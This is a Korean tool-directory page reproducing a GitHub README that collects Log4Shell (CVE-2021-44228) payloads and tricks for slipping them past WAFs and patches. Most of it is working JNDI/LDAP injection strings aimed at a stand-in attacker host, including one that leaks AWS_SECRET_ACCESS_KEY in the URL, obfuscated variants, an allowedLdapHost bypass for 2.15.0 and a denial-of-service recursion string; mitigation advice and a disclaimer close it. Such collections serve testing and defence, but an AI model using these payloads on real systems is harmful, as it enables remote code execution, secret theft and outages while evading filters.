Skip to content
KitploitKITPLOIT
๋„๊ตฌ๋ธ”๋กœ๊ทธ
์ œ์ถœ
๋„๊ตฌ๋ธ”๋กœ๊ทธ
์ œ์ถœ

ํ•ดํ‚น, ์นจํˆฌ ํ…Œ์ŠคํŠธ ๋ฐ ์‚ฌ์ด๋ฒ„ ๋ณด์•ˆ ๋„๊ตฌ๋ฅผ ๋‹น์‹ ์˜ ๋ณด์•ˆ ๋ฌด๊ธฐ๊ณ ์—!

Kitploit์€ ํ•ดํ‚น, ์‚ฌ์ด๋ฒ„ ๋ณด์•ˆ ๋ฐ ์นจํˆฌ ํ…Œ์ŠคํŠธ ๋„๊ตฌ ๋””๋ ‰ํ† ๋ฆฌ์ž…๋‹ˆ๋‹ค. ์ตœ์‹  ํ”„๋กœ์ ํŠธ ์—…๋ฐ์ดํŠธ๋ฅผ ๋ฐœ๊ฒฌํ•˜์—ฌ ์ทจ์•ฝ์ ์„ ์ฐพ๊ณ , ์‹œ์Šคํ…œ์„ ๋ถ„์„ํ•˜๊ณ , ํ…Œ์ŠคํŠธ๋ฅผ ์ž๋™ํ™”ํ•˜๊ณ , ๋ณด์•ˆ์„ ๊ฐ•ํ™”ํ•˜์„ธ์š”.

ยทยทํ”ผ๋“œยท๋ฌธ์˜ยท๊ฐœ์ธ์ •๋ณดยทยฉ 2026 Kitploit

๋„๊ตฌ ๋””๋ ‰ํ† ๋ฆฌ

์นดํ…Œ๊ณ ๋ฆฌ

๋ชจ๋“  ์นดํ…Œ๊ณ ๋ฆฌ ๋ณด๊ธฐ
Loading categories
๋„๊ตฌ/GitHubGitHub/puliczek/cve-2021-44228-poc-log4j-bypass-words
Payload GenerationVulnerability AnalysisExploitationIDS/IPS EvasionWeb Application ExploitationWAF BypassPenetration TestingLearning & EducationRed Teaming

์ธ๊ธฐ

๋ชจ๋‘ ๋ณด๊ธฐ โ†’

์ปค๋ฎค๋‹ˆํ‹ฐ์—์„œ ๊ฐ€์žฅ ๋งŽ์ด ์‚ฌ์šฉ๋˜๋Š” ๋„๊ตฌ๋ฅผ ์ฐพ์•„๋ณด์„ธ์š”.

๋ชจ๋“  ๋„๊ตฌ ํƒ์ƒ‰

๋„๊ตฌ ์ปฌ๋ ‰์…˜์„ ๋‘˜๋Ÿฌ๋ณด์„ธ์š”

๋ชจ๋“  ๋„๊ตฌ ๋ณด๊ธฐ โ†’
๊ณต์œ 
GitHubpuliczek/cve-2021-44228-poc-log4j-bypass-words

CVE-2021-44228-PoC-log4j-bypass-words

๐Ÿฑโ€๐Ÿ’ป โœ‚๏ธ ๐Ÿคฌ CVE-2021-44228 - LOG4J Java ์ต์Šคํ”Œ๋กœ์ž‡ - WAF ์šฐํšŒ ํŠธ๋ฆญ

์ €์žฅ์†Œ ๋ณด๊ธฐ
95013454๋…„ ์ „Kitploit ๊ฒ€ํ†  ์™„๋ฃŒ
๐Ÿค ์ง€์›์„ ํ‘œ์‹œํ•˜์„ธ์š” - ์ฝ˜ํ…์ธ ๊ฐ€ ๋งˆ์Œ์— ๋“ค๋ฉด โญ๏ธ๋ฅผ ๋ˆŒ๋Ÿฌ์ฃผ์„ธ์š” | ํŠธ์œ„ํ„ฐ์— ๊ณต์œ  | ํŒ”๋กœ์šฐํ•˜๊ธฐ

๐Ÿฑโ€๐Ÿ’ป โœ‚๏ธ ๐Ÿคฌ LOG4J Java ์ต์Šคํ”Œ๋กœ์ž‡ - WAF ๋ฐ ํŒจ์น˜ ์šฐํšŒ ํŠธ๋ฆญ

๐Ÿ“ ์„ค๋ช…

CVE-2021-44228๋Š” ๋‹ค์Œ์—์„œ ์ž‘๋™ํ•ฉ๋‹ˆ๋‹ค:

log4j: 2.0 <= Apache log4j <= 2.14.1

์ด๋ฏธ ํŒจ์น˜๋œ Java ๋ฒ„์ „: 6u211+, 7u201+, 8u191+, 11.0.1+.

Windows Defender์—์„œ jndi:ldap:....์„ ํฌํ•จํ•˜๋Š” .java ํŒŒ์ผ์„ ์ œ๊ฑฐํ•˜๊ธฐ ์‹œ์ž‘ํ–ˆ์Šต๋‹ˆ๋‹ค.

๊ฐ„๋‹จํ•œ ๊ณต๊ฒฉ์ž ์Šคํฌ๋ฆฝํŠธ (๊ฐ€๋Šฅํ•œ RCE):

${jndi:ldap://somesitehackerofhell.com/z}

WAF ๋˜๋Š” ๊ฐœ๋ฐœ์ž๊ฐ€ ๋‹ค์Œ ๊ตฌ๋ฌธ์„ ์ฐจ๋‹จํ•˜๊ธฐ ์‹œ์ž‘ํ–ˆ์Šต๋‹ˆ๋‹ค:

  • "ldap:"
  • "jndi:"

์• ํ”Œ๋ฆฌ์ผ€์ด์…˜์„ ๋ณดํ˜ธํ•˜๊ธฐ ์œ„ํ•ด.

๊ทธ๋Ÿฌ๋‚˜ ๊ณต๊ฒฉ์ž๋Š” ๋‹ค์Œ ๊ธฐ์ˆ  ์ค‘ ํ•˜๋‚˜๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ์ด๋ฅผ ์šฐํšŒํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค:

1. ์‹œ์Šคํ…œ ํ™˜๊ฒฝ ๋ณ€์ˆ˜

${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//somesitehackerofhell.com/z}

Apache Log4j 2 ๋ฌธ์„œ์—์„œ: ${env:ENV_NAME:-default_value}

ENV_NAME ์‹œ์Šคํ…œ ํ™˜๊ฒฝ ๋ณ€์ˆ˜๊ฐ€ ์—†์œผ๋ฉด :- ๋’ค์˜ ํ…์ŠคํŠธ๋ฅผ ์‚ฌ์šฉํ•ฉ๋‹ˆ๋‹ค.

๊ณต๊ฒฉ์ž๋Š” ENV_NAME ๋Œ€์‹  ์–ด๋–ค ์ด๋ฆ„์ด๋“  ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ์ง€๋งŒ, ์กด์žฌํ•˜์ง€ ์•Š์•„์•ผ ํ•ฉ๋‹ˆ๋‹ค.

๋˜๋Š” ํ•ด์ปค๊ฐ€ ํ™˜๊ฒฝ ๋ณ€์ˆ˜๋ฅผ ์ฝ์„ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์˜ˆ: AWS_SECRET_ACCESS_KEY:

${jndi:ldap://somesitehackerofhell.com/z?leak=${env:AWS_SECRET_ACCESS_KEY:-NO_EXISTS}}

๋” ๋งŽ์€ ๋น„๋ฐ€์€ ๐Ÿฆ„๐Ÿ”’ ํ™˜๊ฒฝ ๋ณ€์ˆ˜์— ์žˆ๋Š” ๋น„๋ฐ€ ๋ชฉ๋ก ๐Ÿ–ฅ๏ธ์—์„œ ํ™•์ธํ•˜์„ธ์š”.

์‹œ์Šคํ…œ ํ™˜๊ฒฝ ๋ณ€์ˆ˜๋ฅผ ํ™•์ธํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค:

  • Windows์—์„œ PowerShell๋กœ ์‹คํ–‰: dir env:
  • Linux/MacOS์—์„œ ํ„ฐ๋ฏธ๋„๋กœ ์‹คํ–‰: printenv ๋˜๋Š” env

2. ์†Œ๋ฌธ์ž ๋˜๋Š” ๋Œ€๋ฌธ์ž ์กฐํšŒ

${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://somesitehackerofhell.com/z}

${${upper:j}ndi:${upper:l}${upper:d}a${lower:p}://somesitehackerofhell.com/z}

์†Œ๋ฌธ์ž ์กฐํšŒ (Lower Lookup) LowerLookup์€ ์ „๋‹ฌ๋œ ์ธ์ˆ˜๋ฅผ ์†Œ๋ฌธ์ž๋กœ ๋ณ€ํ™˜ํ•ฉ๋‹ˆ๋‹ค. ๊ฐ’์€ ์ค‘์ฒฉ ์กฐํšŒ์˜ ๊ฒฐ๊ณผ์ผ ๊ฒƒ์ž…๋‹ˆ๋‹ค.

${lower:<text>}

๋Œ€๋ฌธ์ž ์กฐํšŒ (Upper Lookup) UpperLookup์€ ์ „๋‹ฌ๋œ ์ธ์ˆ˜๋ฅผ ๋Œ€๋ฌธ์ž๋กœ ๋ณ€ํ™˜ํ•ฉ๋‹ˆ๋‹ค. ๊ฐ’์€ ์ค‘์ฒฉ ์กฐํšŒ์˜ ๊ฒฐ๊ณผ์ผ ๊ฒƒ์ž…๋‹ˆ๋‹ค.

${upper:<text>}


3. "::-" ํ‘œ๊ธฐ๋ฒ•

${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://somesitehackerofhell.com/z}


4. ๋Œ€๋ฌธ์ž์™€ ํ•จ๊ป˜ ์œ ํšจํ•˜์ง€ ์•Š์€ ์œ ๋‹ˆ์ฝ”๋“œ ๋ฌธ์ž

${jnd${upper:ฤฑ}:ldap://somesitehackerofhell.com/z}

ฤฑ๊ฐ€ i๋กœ ๋ณ€ํ™˜๋ฉ๋‹ˆ๋‹ค.


5. ์‹œ์Šคํ…œ ์†์„ฑ

${jnd${sys:SYS_NAME:-i}:ldap:/somesitehackerofhell.com/z}

SYS_NAME ์‹œ์Šคํ…œ ์†์„ฑ์ด ์—†์œผ๋ฉด :- ๋’ค์˜ ํ…์ŠคํŠธ๋ฅผ ์‚ฌ์šฉํ•ฉ๋‹ˆ๋‹ค.


6. ":-" ํ‘œ๊ธฐ๋ฒ•

${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://somesitehackerofhell.com/z}


7. ๋‚ ์งœ

${${date:'j'}${date:'n'}${date:'d'}${date:'i'}:${date:'l'}${date:'d'}${date:'a'}${date:'p'}://somesitehackerofhell.com/z}

Java ๋‚ ์งœ ํ˜•์‹์€ YYYY๋ฅผ 2021๋กœ ๋ณ€ํ™˜ํ•˜์ง€๋งŒ, 'YYYY'๋ฅผ YYYY๋กœ, 'j'๋ฅผ j๋กœ ๋ณ€ํ™˜ํ•ฉ๋‹ˆ๋‹ค.


8. HTML URL ์ธ์ฝ”๋”ฉ

๋‹ค์Œ ๋ฌธ์ž๋ฅผ ๋ฐ”๊ฟ‰๋‹ˆ๋‹ค:

  • } ๋ฅผ %7D ๋กœ
  • { ๋ฅผ %7B ๋กœ
  • $ ๋ฅผ %24 ๋กœ

์ž์„ธํ•œ ๋‚ด์šฉ์€ HTML URL ์ธ์ฝ”๋”ฉ ์ฐธ์กฐ์—์„œ ํ™•์ธํ•˜์„ธ์š”.


9. ์กด์žฌํ•˜์ง€ ์•Š๋Š” ์กฐํšŒ

${${what:ever:-j}${some:thing:-n}${other:thing:-d}${and:last:-i}:ldap://somesitehackerofhell.com/z}

์กฐํšŒ์˜ ์กด์žฌ ์—ฌ๋ถ€๋ฅผ ํ™•์ธํ•˜์ง€ ์•Š๊ณ  ๊ธฐ๋ณธ๊ฐ’์„ ์‚ฌ์šฉํ•ฉ๋‹ˆ๋‹ค.


10. ๋‹คํ˜•์„ฑ (JSON REST API ์š”์ฒญ)


root@kitploit:~
{
    "one-${jnd${a":"a:-i}:ld${",
    "two":"o:-a}p://somesitehackerofhell.com/z}
}

"์ด ํ‚ค์™€ ๊ฐ’์€ ๊ฐœ๋ณ„์ ์œผ๋กœ๋Š” ๊ณต๊ฒฉ์„ ๋‚˜ํƒ€๋‚ด์ง€ ์•Š์ง€๋งŒ, ๋ชจ๋‘ ํ•จ๊ป˜ ์‚ฌ์šฉํ•˜๋ฉด ๊ณต๊ฒฉ์ด๋ฉฐ, ์ด ๊ณต๊ฒฉ์€ JSON ํŒŒ์„œ ๋•Œ๋ฌธ์— ํƒ์ง€ ์‹œ์Šคํ…œ์— ํˆฌ๋ช…ํ•˜๊ฒŒ ๋ณด์ž…๋‹ˆ๋‹ค." ์ž์„ธํžˆ ์ฝ๊ธฐ...


11. ์œ ๋‹ˆ์ฝ”๋“œ ๋ฌธ์ž (JSON REST API ์š”์ฒญ)

${\u006a\u006e\u0064\u0069:ldap://somesitehackerofhell.com/z}

์ผ๋ถ€ ๋ฌธ์ž๋ฅผ ์œ ๋‹ˆ์ฝ”๋“œ๋กœ ๋ณ€ํ™˜ํ•ฉ๋‹ˆ๋‹ค.

์œ ๋‹ˆ์ฝ”๋“œ ๋ณ€ํ™˜๊ธฐ ์˜จ๋ผ์ธ


12. #์„ ์‚ฌ์šฉํ•œ ํŠธ๋ฆญ (log4j 2.15์—์„œ ์ž‘๋™)

${jndi:ldap://127.0.0.1#somesitehackerofhell.com/z}

Log4J 2.15.0์—์„œ allowedLdapHost ๋ฐ allowedClasses ๊ฒ€์‚ฌ๋ฅผ ์šฐํšŒํ•ฉ๋‹ˆ๋‹ค. java.net.URI getHost() ๋ฉ”์„œ๋“œ๋Š” # ์•ž์˜ ๊ฐ’์„ ์‹ค์ œ ํ˜ธ์ŠคํŠธ๋กœ ๋ฐ˜ํ™˜ํ•ฉ๋‹ˆ๋‹ค. ๊ทธ๋Ÿฌ๋‚˜ JNDI/LDAP ๋ฆฌ์กธ๋ฒ„๋Š” ์ „์ฒด ํ˜ธ์ŠคํŠธ ์ด๋ฆ„ ๋ฌธ์ž์—ด๋กœ ํ•ด์„ํ•˜์—ฌ ์•…์˜์ ์ธ LDAP ์„œ๋ฒ„์— ์—ฐ๊ฒฐ์„ ์‹œ๋„ํ•ฉ๋‹ˆ๋‹ค.

์ž์„ธํžˆ ์ฝ๊ธฐ...


13. Dos ๊ณต๊ฒฉ (log4j 2.8 - 2.16 - CVE-2021-45105์—์„œ ์ž‘๋™)

${${::-${::-$${::-j}}}}

์–ด๋–ค ์ด์œ ๋กœ๋“  ๋‹ค์Œ ๋ฌธ์ž์—ด์— ๋Œ€ํ•ด ๋ฌธ์ž์—ด ๋Œ€์ฒด๊ฐ€ ์‹œ๋„๋˜๋ฉด ๋ฌดํ•œ ์žฌ๊ท€๋ฅผ ์œ ๋ฐœํ•˜์—ฌ ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜์ด ์ถฉ๋Œํ•ฉ๋‹ˆ๋‹ค.

์ž์„ธํžˆ ์ฝ๊ธฐ...


14. PDF๋ฅผ ์ „๋‹ฌ ์ฑ„๋„๋กœ ์‚ฌ์šฉ

CVE-2021-44228์„ ์•…์šฉํ•˜๊ธฐ ์œ„ํ•ด ํŠน์ˆ˜ PDF ํŒŒ์ผ์„ ์ œ์ž‘ํ•ฉ๋‹ˆ๋‹ค.

PDF ์˜ˆ์‹œ

PDF ํŒŒ์ผ ๋ฐ›๊ธฐ ๋ฐ ์ž์„ธํžˆ ์ฝ๊ธฐ...

ํ…Œ์ŠคํŠธ

์—”ํŠธ๋ฆฌ๋ฅผ ํ…Œ์ŠคํŠธํ•˜๋ ค๋ฉด ๋‹ค์Œ์„ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค:

  • https://canarytokens.org/generate - Log4Shell ํ† ํฐ ์„ ํƒ (์•Œ๋ฆผ์€ ์ด๋ฉ”์ผ ๋˜๋Š” ์›นํ›…์œผ๋กœ ์ „์†ก๋จ), ์ƒ์„ฑ ํ›„ somesitehackerofhell.com/z๋ฅผ ๋ฐ”๊ฟ‰๋‹ˆ๋‹ค.
  • https://dnslog.cn/ - ์„œ๋ธŒ๋„๋ฉ”์ธ์„ ์ƒ์„ฑํ•˜๊ณ  somesitehackerofhell.com/z๋ฅผ ๋ฐ”๊ฟ‰๋‹ˆ๋‹ค.

โœจ CVE-2021-44228๋กœ๋ถ€ํ„ฐ ๋ณดํ˜ธํ•˜๋Š” ์ตœ๊ณ ์˜ ํ•ด๊ฒฐ์ฑ…

tl;dr log4j-2.17.1 ์ด์ƒ์œผ๋กœ ์—…๋ฐ์ดํŠธํ•˜์„ธ์š”.

Log4j 1.x ์™„ํ™”: Log4j 1.x์—๋Š” Lookups๊ฐ€ ์—†์œผ๋ฏ€๋กœ ์œ„ํ—˜์ด ๋‚ฎ์Šต๋‹ˆ๋‹ค. Log4j 1.x๋ฅผ ์‚ฌ์šฉํ•˜๋Š” ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜์€ ๊ตฌ์„ฑ์—์„œ JNDI๋ฅผ ์‚ฌ์šฉํ•˜๋Š” ๊ฒฝ์šฐ์—๋งŒ ์ด ๊ณต๊ฒฉ์— ์ทจ์•ฝํ•ฉ๋‹ˆ๋‹ค. ์ด ์ทจ์•ฝ์ ์— ๋Œ€ํ•ด ๋ณ„๋„์˜ CVE(CVE-2021-4104)๊ฐ€ ๋“ฑ๋ก๋˜์—ˆ์Šต๋‹ˆ๋‹ค. ์™„ํ™” ๋ฐฉ๋ฒ•: ๋กœ๊น… ๊ตฌ์„ฑ์„ ๊ฐ์‚ฌํ•˜์—ฌ JMSAppender๊ฐ€ ๊ตฌ์„ฑ๋˜์–ด ์žˆ์ง€ ์•Š์€์ง€ ํ™•์ธํ•˜์„ธ์š”. JMSAppender๊ฐ€ ์—†๋Š” Log4j 1.x ๊ตฌ์„ฑ์€ ์ด ์ทจ์•ฝ์ ์˜ ์˜ํ–ฅ์„ ๋ฐ›์ง€ ์•Š์Šต๋‹ˆ๋‹ค.

Log4j 2.x ์™„ํ™”: ์•„๋ž˜ ์™„ํ™” ๊ธฐ๋ฒ• ์ค‘ ํ•˜๋‚˜๋ฅผ ๊ตฌํ˜„ํ•˜์„ธ์š”.

  • Java 8(๋˜๋Š” ๊ทธ ์ด์ƒ) ์‚ฌ์šฉ์ž๋Š” ๋ฆด๋ฆฌ์Šค 2.17.1๋กœ ์—…๊ทธ๋ ˆ์ด๋“œํ•ด์•ผ ํ•ฉ๋‹ˆ๋‹ค.
  • Java 7์ด ํ•„์š”ํ•œ ์‚ฌ์šฉ์ž๋Š” ๋ฆด๋ฆฌ์Šค 2.12.4๊ฐ€ ์ œ๊ณต๋  ๋•Œ ์—…๊ทธ๋ ˆ์ด๋“œํ•ด์•ผ ํ•ฉ๋‹ˆ๋‹ค(์ž‘์—… ์ง„ํ–‰ ์ค‘, ๊ณง ์ œ๊ณต๋  ์˜ˆ์ •).
  • ๊ทธ๋ ‡์ง€ ์•Š์œผ๋ฉด, ํด๋ž˜์ŠคํŒจ์Šค์—์„œ JndiLookup ํด๋ž˜์Šค๋ฅผ ์ œ๊ฑฐํ•˜์„ธ์š”: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class ๋ฐ HTTP ํ—ค๋”๋‚˜ ์‚ฌ์šฉ์ž ์ž…๋ ฅ๊ณผ ๊ฐ™์€ ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜ ์™ธ๋ถ€ ์ถœ์ฒ˜์—์„œ ์˜ค๋Š” ${ctx:loginId} ๋˜๋Š” $${ctx:loginId}์™€ ๊ฐ™์€ Context Lookups์— ๋Œ€ํ•œ ์ฐธ์กฐ๋ฅผ ์ œ๊ฑฐํ•˜์„ธ์š”.

log4j-core JAR ํŒŒ์ผ๋งŒ ์ด ์ทจ์•ฝ์ ์˜ ์˜ํ–ฅ์„ ๋ฐ›์Šต๋‹ˆ๋‹ค. log4j-api JAR ํŒŒ์ผ๋งŒ ์‚ฌ์šฉํ•˜๊ณ  log4j-core JAR ํŒŒ์ผ ์—†์ด ์‚ฌ์šฉํ•˜๋Š” ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜์€ ์ด ์ทจ์•ฝ์ ์˜ ์˜ํ–ฅ์„ ๋ฐ›์ง€ ์•Š์Šต๋‹ˆ๋‹ค.

์ถœ์ฒ˜ ๋ฐ ์ž์„ธํžˆ ์ฝ๊ธฐ

์•ˆ์ „ํ•˜๊ฒŒ ์œ ์ง€ํ•˜์„ธ์š”!

๐Ÿค ์ง€์›์„ ํ‘œ์‹œํ•˜์„ธ์š”

๐Ÿค ์ง€์›์„ ํ‘œ์‹œํ•˜์„ธ์š” - ์ฝ˜ํ…์ธ  ๋˜๋Š” ๋ฐˆ์ด ๋งˆ์Œ์— ๋“ค๋ฉด โญ๏ธ๋ฅผ ๋ˆŒ๋Ÿฌ์ฃผ์„ธ์š” | ํŠธ์œ„ํ„ฐ์— ๊ณต์œ  | ํŒ”๋กœ์šฐํ•˜๊ธฐ

log2

๐Ÿ“ ์œ ์šฉํ•œ ๋งํฌ

  • Apache Log4j 2 v. 2.15.0 - ์‚ฌ์šฉ์ž ๊ฐ€์ด๋“œ
  • lower/upper ์šฐํšŒ์˜ ์ฒซ ๋ฒˆ์งธ ๊ณต๊ฐœ ๊ฐ€๋Šฅ
  • CVE-2021-44228 (Apache Log4j ์›๊ฒฉ ์ฝ”๋“œ ์‹คํ–‰)
  • HTML URL ์ธ์ฝ”๋”ฉ ์ฐธ์กฐ
  • GitHub ๊ฒ€ํ†  CVE-2021-44228 - Log4j์˜ ์›๊ฒฉ ์ฝ”๋“œ ์ฃผ์ž…
  • Apache Log4j ๋ณด์•ˆ ์ทจ์•ฝ์ 
  • ํ”„๋กœ๊ทธ๋žจ log4j-detector - CVE-2021-44228 ๋ฐ CVE-2021-45046์— ์ทจ์•ฝํ•œ Log4J ๋ฒ„์ „์„ ํŒŒ์ผ ์‹œ์Šคํ…œ ๋‚ด์—์„œ ํƒ์ง€ํ•ฉ๋‹ˆ๋‹ค.
  • ์œ ํšจํ•œ JSON REST API ์š”์ฒญ์ธ ๋‹คํ˜•์„ฑ Log4J ์ต์Šคํ”Œ๋กœ์ž‡
  • ๋ฐ์ดํ„ฐ ํฌ๋งท ๋‚œ๋…ํ™”๋ฅผ ์‚ฌ์šฉํ•œ NGFW/WAF ์šฐํšŒ
  • LOG4J2-3230 ํŠน์ • ๋ฌธ์ž์—ด์ด ๋ฌดํ•œ ์žฌ๊ท€๋ฅผ ์œ ๋ฐœํ•  ์ˆ˜ ์žˆ์Œ
  • Log4J 2.15.0์—์„œ allowedLdapHost ๋ฐ allowedClasses ๊ฒ€์‚ฌ๋ฅผ ์šฐํšŒํ•˜๋Š” ๋ฐฉ๋ฒ•์˜ PoC
  • ๐Ÿฆ„๐Ÿ”’ ํ™˜๊ฒฝ ๋ณ€์ˆ˜์— ์žˆ๋Š” ๋น„๋ฐ€ ๋ชฉ๋ก ๐Ÿ–ฅ๏ธ
  • PDF๋ฅผ ์ „๋‹ฌ ์ฑ„๋„๋กœ ์‚ฌ์šฉํ•œ CVE-2021-44228 ์•…์šฉ - PoC

๐Ÿ™Œ ๊ธฐ์—ฌํ•ด ์ฃผ์‹  ์‚ฌ์šฉ์ž๋ถ„๋“ค๊ป˜ ๊ฐ์‚ฌ๋“œ๋ฆฝ๋‹ˆ๋‹ค

  • ๋ชจ๋“  ๊ธฐ์—ฌ์ž
  • Whatsec - ์ถ”๊ฐ€ ์šฐํšŒ ์˜ˆ์ œ ์ œ๊ณต
  • manjula-aw - ๋ณด์•ˆ ์„น์…˜ ๊ฐœ์„ 
  • juliusmusseau - ์ถ”๊ฐ€ ์šฐํšŒ ์˜ˆ์ œ ์ œ๊ณต

โœ”๏ธ ๋ฉด์ฑ… ์กฐํ•ญ

์ด ํ”„๋กœ์ ํŠธ๋Š” ๊ต์œก ๋ชฉ์ ์œผ๋กœ๋งŒ ์‚ฌ์šฉ๋  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์‚ฌ์ „ ํ—ˆ๊ฐ€ ์—†์ด ๋Œ€์ƒ ์‹œ์Šคํ…œ์— ๋Œ€ํ•ด ์ด ์†Œํ”„ํŠธ์›จ์–ด๋ฅผ ์‚ฌ์šฉํ•˜๋Š” ๊ฒƒ์€ ๋ถˆ๋ฒ•์ด๋ฉฐ, ์ด ์†Œํ”„ํŠธ์›จ์–ด์˜ ์˜ค์šฉ์œผ๋กœ ์ธํ•œ ์†ํ•ด์— ๋Œ€ํ•ด ์ €์ž๋Š” ์ฑ…์ž„์„ ์ง€์ง€ ์•Š์Šต๋‹ˆ๋‹ค.

์ €์ž๋Š” CVE-2021-44228 ๋ฐ ์ผ๋ถ€ ์šฐํšŒ ๊ธฐ๋ฒ•์˜ ์ž‘์„ฑ์ž๊ฐ€ ์•„๋‹™๋‹ˆ๋‹ค.

๋„๊ตฌ ๋‹ค์šด๋กœ๋“œ